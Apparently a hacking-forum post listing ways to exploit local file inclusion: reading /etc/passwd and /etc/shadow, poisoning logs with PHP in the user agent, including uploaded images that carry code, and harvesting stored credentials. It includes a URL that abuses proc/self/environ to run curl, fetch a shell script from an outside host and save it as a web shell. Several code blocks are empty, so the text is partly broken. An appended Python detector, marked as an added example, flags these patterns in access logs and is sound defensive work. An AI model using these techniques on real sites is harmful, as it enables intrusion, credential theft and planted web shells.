What can you use LFI for?

Alright, so I got this question often... Some guy got an LFI vuln some place, but "what the fuck do I use it for?"

Well, there are a few things you can do with it..

1. If /etc/passwd contains the user passwords on the system, you can use ssh (assuming they have ssh and use the system users as logins), or, if /etc/passwd is just x'ed out, maybe someone is a fucking idiot and made /etc/shadow readable for anyone... On a Windows machine maybe you can include the SAM file? Dunno..

2. You can try to include the error or access log, then telnet to the server and make it write PHP code to the error or access log; that way you can get a shell! Also, if the error or access log logs the user agent or other shit, you can just browse the page with PHP in the user agent and then include it.

3. If it's a shared host or a server with more pages on it, you can try to find upload forms etc. on the other pages hosted on the same server, then make an image containing PHP code inside it and include it from the page you want to hack, that way getting shell access! You can ofc do this on the same domain too, if it has some kind of upload form, and it doesn't need to be images; it can be documents or PDFs, anything!

4. Finding config or other interesting files... Many idiots store their ftp and/or ssh info in .txt or doc files outside the www dir, but if you have LFI you can include those anyway! It takes a bit of time trying out file names and shit though xD Also, .config files or config.php files can contain things like root mysqld info, and that can lead to more interesting stuff! Also, maybe a page has a basic login system that reads from a config.php, so you can get admin access on the page..


5. If it's a site and forum, you can upload an image with arbitrary code, then include and execute it..

6. You can even make it vuln to LFI
Code:



then
Code:
http://anything.org/index.php?action=../proc/self/environ?cmd=curlhttp://zero-thunder.com/mu.txt -o zero.php


and the shell will be up like this

Code:
http://anything.org/zero.php




7. Or you can do something like this..
If proc/self/environ is accessible you can
Code:



zero.php is the shell and the server will download
Code:

http://zero-thunder.com/mu.txt

and it will save it as zero.php and you will get something like this

Code:
http://anything.org/zero.php
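
Seen from the defending side, the techniques in the list above leave recognizable traces in a web server's access log. The following is an added example, not code from the original post: it flags traversal sequences, includes of /etc/passwd, /etc/shadow, proc/self/environ or a log file, and PHP tags in logged headers. The rule names, the combined-log-format assumption and the sample lines are constructed for this example.

```python
import re
from urllib.parse import unquote

# Combined log format: request line, status, size, referer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "\S+ (?P<target>\S+)[^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')

# Rule names are labels chosen for this example, one per technique in the post.
TARGET_RULES = {
    "traversal": re.compile(r"\.\.[/\\]"),
    "system-file": re.compile(r"/etc/(passwd|shadow)|proc/self/environ", re.I),
    "log-include": re.compile(r"(access|error)[._-]?log", re.I),
}
PHP_TAG = re.compile(r"<\?")  # PHP open tag, including the short forms

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?action=news HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?action=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1830 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php /* constructed */ ?>"',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?action=../proc/self/environ HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded ../ is still seen."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def classify(line):
    """Return (ip, sorted rule names), or None if the line does not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    target = decode(m.group("target"))
    hits = {name for name, rx in TARGET_RULES.items() if rx.search(target)}
    # PHP in a logged header is the precursor to including the log (item 2).
    if PHP_TAG.search(m.group("agent")) or PHP_TAG.search(m.group("referer")):
        hits.add("php-in-header")
    return m.group("ip"), sorted(hits)

def flagged(lines):
    """Parsed lines that matched at least one rule."""
    return [r for r in map(classify, lines) if r and r[1]]
```

Calling `flagged(SAMPLE)` returns the three requests from 198.51.100.7 and skips the ordinary one; a hit in the log shows an attempt, and whether the include succeeded still has to be checked against the response and the application code.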


Reference: cyberterrorist
